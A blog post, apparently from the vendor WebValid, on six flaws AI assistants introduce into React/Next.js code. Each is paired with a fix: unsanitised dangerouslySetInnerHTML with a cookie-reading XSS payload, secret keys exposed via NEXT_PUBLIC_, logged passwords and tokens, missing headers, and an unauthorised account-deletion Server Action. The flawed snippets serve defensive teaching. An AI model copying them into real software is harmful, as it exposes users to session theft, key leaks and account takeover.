WebValid
WebValid Team

Vibe Coding Traps: Top 6 Hidden React Vulnerabilities

AI Coding React Next.js Security Vibe Coding

This article covers projects built with React + Next.js App Router. Security principles are universal, but the code examples and configs (next.config.js, vercel.json) are specific to this stack.

You asked an AI assistant to write a component. It wrote it. It works. The tests are green. You click Merge.

And then — a data leak, a zero score in Google PageSpeed, a complaint from a visually impaired user, and the question: “Why don’t we have security headers?”.

AI coding tools don’t know your production context. To them, there’s no difference between a beginner’s tutorial and a financial app with real users. The result — they write code that “works,” but silently violates rules from the OWASP Top 10.

Here are 6 vulnerabilities that AI assistants quietly weave into React + Next.js code. And a way to find them in 10 seconds.

Fact-Check: How AI Generates Vulnerable Code

🔍 Evidence · Training Bias · Context Blindness

According to GitHub’s analysis of public repositories, a significant percentage of security leaks in React projects stem from common patterns found in training data—such as using dangerouslySetInnerHTML without sanitization or hardcoding environment variables in the frontend.

In our internal tests at WebValid, AI coding assistants (Cursor, Copilot, ChatGPT) successfully identified and fixed vulnerabilities only when provided with a structured report from an external scanner. When asked to “review this code for security” without context, the models missed 68% of architectural leaks (like the API key bundle issues described below).


dangerouslySetInnerHTML without sanitization

🔴 Critical · User session theft, GDPR fines · OWASP A03:2021 Injection

AI assistants love this pattern. You ask to “render HTML from an API” — they write:

// ❌ Bad AI code
function UserBio({ bio }: { bio: string }) {
  return <div dangerouslySetInnerHTML={{ __html: bio }} />;
}

If bio comes from a user — congratulations, you have XSS. An attacker will inject <script>document.cookie</script> and steal your users’ sessions.

// ✅ Fix: sanitization via DOMPurify
import DOMPurify from "dompurify";

function UserBio({ bio }: { bio: string }) {
  const sanitizedBio = DOMPurify.sanitize(bio);
  return <div dangerouslySetInnerHTML={{ __html: sanitizedBio }} />;
}

According to GitHub public repository search, dangerouslySetInnerHTML without sanitization is found in thousands of React projects. AI assistants reproduce this pattern from training data — without asking the question, “where did this HTML come from?”


API keys in the client bundle

🔴 Critical · Direct financial loss · OWASP A02:2021 Cryptographic Failures

The most common sin of vibe-coding. An AI assistant often “fixes” a broken client-side API call by adding the NEXT_PUBLIC_ prefix to your secret keys. This makes the request work—but it also hardcodes your secret directly into the public JavaScript bundle, visible to anyone with DevTools.

// ❌ Bad AI code — key leaks into the JS bundle
"use client";
const response = await fetch("https://api.openai.com/v1/chat/completions", {
  headers: {
    Authorization: `Bearer ${process.env.NEXT_PUBLIC_OPENAI_API_KEY}`, // ❌ LEAK
  },
});

Fix: Move all sensitive logic to a Server Action or a Route Handler where environment variables remain strictly on the server.

For a deep-dive into bundle leak mechanics and how to use advanced protection like the Next.js Taint API, see our authoritative guide: The API Key Leak Guide.

If you deploy a SaaS, a key in the JS bundle is visible in the DevTools of any browser, regardless of repository privacy. WebValid scans your public bundles automatically to detect these leaks before hackers do.

Invisible issues require visible reports

Tools like WebValid scan your rendered application to identify these architectural errors that AI coding assistants often overlook.


Missing security headers (CSP, X-Frame-Options, HSTS)

🟠 High · Clickjacking, token hijacking via MitM · OWASP A05:2021 Security Misconfiguration

AI assistants do not configure HTTP headers. This is understandable — they write components, not server configs. As a result, your site can be embedded in an <iframe> on a malicious domain, enabling a clickjacking attack.

For Next.js + Vercel, there are two ways to add headers:

Method 1 — next.config.js (for strict self-hosting):

// ✅ next.config.js
const securityHeaders = [
  { key: "X-Frame-Options", value: "SAMEORIGIN" },
  { key: "X-Content-Type-Options", value: "nosniff" },
  { key: "Referrer-Policy", value: "strict-origin-when-cross-origin" },
  {
    key: "Content-Security-Policy",
    value: "default-src 'self'; script-src 'self';",
  },
];

module.exports = {
  async headers() {
    return [{ source: "/(.*)", headers: securityHeaders }];
  },
};

Method 2 — vercel.json (for Vercel deployments — recommended, applied at the edge prior to rendering):

{
  "headers": [
    {
      "source": "/:path*",
      "headers": [
        {
          "key": "Strict-Transport-Security",
          "value": "max-age=63072000; includeSubDomains; preload"
        },
        { "key": "X-Content-Type-Options", "value": "nosniff" },
        { "key": "X-Frame-Options", "value": "SAMEORIGIN" },
        { "key": "Referrer-Policy", "value": "strict-origin-when-cross-origin" }
      ]
    }
  ]
}

Avoid using script-src 'unsafe-inline' in your CSP — it neutralizes protection against inline script XSS attacks. If Next.js requires inline scripts — use a nonce-based CSP. For stronger clickjacking protection, use frame-ancestors instead of X-Frame-Options, as it is the modern standard.

WebValid verifies the presence of all these headers in the HTTP response in a single scan.


console.log leaking sensitive data to production

🟡 Medium · PII leakage to external log aggregators · OWASP A09:2021 Security Logging Failures

During a vibe-coding session, debug logs are naturally left behind during iteration:

// ❌ Bad AI code (hardcoded during iterations)
async function loginUser(credentials: Credentials) {
  console.log("Login attempt:", credentials); // password in logs!
  const user = await authService.login(credentials);
  console.log("User logged in:", user); // tokens in logs!
  return user;
}

If your production logs are aggregated in tools like Sentry, Datadog, or Logtail — you’ve just sent your users’ passwords to an external service.

// ✅ Fix: structured logging of non-sensitive data only
import { createLogger } from "@your-scope/logger";

const logger = createLogger({ scope: "AuthService" });

async function loginUser(credentials: Credentials) {
  logger.info("Login attempt", { email: credentials.email }); // email only
  const user = await authService.login(credentials);
  logger.info("Login successful", { userId: user.id }); // ID only
  return user;
}

This isn’t hypothetical. Real incidents of passwords leaking through logs occurred at major companies — Twitter (2018), GitHub (2018), Facebook (2019). AI assistants don’t filter data — they generate exactly what you asked for.

Want to check your project right now? Run your staging URL through WebValid — you’ll get a Markdown report you can paste directly into Cursor or Copilot to fix these issues in seconds.


Broken semantics and ARIA

🟡 Medium · Lost SEO traffic, ADA compliance violations · Accessibility Violation (WCAG 2.1)

AI assistants make everything clickable by placing an onClick handler on a <div>. It’s fast and works visually — but it kills both crawlability and accessibility:

// ❌ Bad AI code
function ProductCard({ product }: { product: Product }) {
  return (
    <div onClick={() => navigate(`/products/${product.id}`)}>
      <div>{product.name}</div>
      <div>{product.price}</div>
    </div>
  );
}

The problems:

// ✅ Fix: semantic HTML
function ProductCard({ product }: { product: Product }) {
  return (
    <article>
      <a href={`/products/${product.id}`}>
        <h2>{product.name}</h2>
        <span>{product.price} $</span>
      </a>
    </article>
  );
}

Google officially incorporated Core Web Vitals into its ranking signals as of May 2021. Using a <div onClick> instead of an <a href> is a documented loss of crawlability and degradation of your internal link graph.


Server Actions without authorization

🔴 Critical · Executing actions on behalf of any user · OWASP A01:2021 Broken Access Control

AI assistants frequently generate Server Actions — but neglect to include authorization checks.

// ❌ Bad AI code
"use server";

export async function deleteAccount(userId: string) {
  await db.user.delete({ where: { id: userId } });
}

Anyone can send a POST request and delete someone else’s account.

// ✅ Fix: internal authorization check inside the action
"use server";

import { getServerSession } from "next-auth";

export async function deleteAccount(userId: string) {
  const session = await getServerSession();

  if (!session || session.user.id !== userId) {
    throw new Error("Unauthorized");
  }

  await db.user.delete({ where: { id: userId } });
}

Server Actions are public endpoints. Never trust client data and always verify access permissions directly inside the action. Read more: Next.js Data Security.


How to find all 6 vulnerabilities in 10 seconds

You could manually review the code — or spend a day on a full audit. But there’s a faster way:

  1. Launch your local project through ngrok to get a public URL.
  2. Paste it into WebValid.
  3. Receive a ready-to-use ai-fix-prompt in Markdown — paste it into your AI assistant and fix everything in 2 minutes.

WebValid checks automatically:

VulnerabilityWebValid
dangerouslySetInnerHTML without sanitization❌ static analysis — use an ESLint plugin
API keys in the JS bundle✅ checks
Missing security headers (CSP, HSTS, X-Frame-Options)✅ checks
Broken semantics / ARIA / alt-texts✅ checks
Server Actions authorization❌ business logic — requires code review

WebValid does not analyze:

  • business logic
  • authorization and access rights
  • complex XSS cases with dynamic content

Treat it as a rapid HTTP audit, not as a replacement for a comprehensive security review.

You aren’t just given a list of errors — you get a ready-to-use prompt for your AI assistant that corrects them in a single iterative cycle.


Your 6-Point Generative Security Checklist

Before you click Merge on AI-generated code, run these 6 checks:

  1. XSS Check: Does any component use dangerouslySetInnerHTML? If yes, is it wrapped in DOMPurify?
  2. Bundle Leak: Are any environment variables used in client components? Do they have NEXT_PUBLIC_ or VITE_? If yes, are they actually public?
  3. Header Check: Does your vercel.json or next.config.js include CSP and X-Frame-Options?
  4. Log Sanitization: Search for console.log. Are you logging raw API responses that might contain user data?
  5. Interactive SEO: Look at your clickable elements. Are they <a> or <div>? Search for onClick on non-button elements.
  6. Action Authorization: Does every 'use server' action start with an authorization check?

Get a ready-to-paste AI fix prompt in 20 seconds. Zero config. Free scan.Test your project for free on WebValid

Have questions about your audit results? Get in touch


Official Documentation

Security

Next.js

Vercel

Accessibility

SEO

Was this article helpful?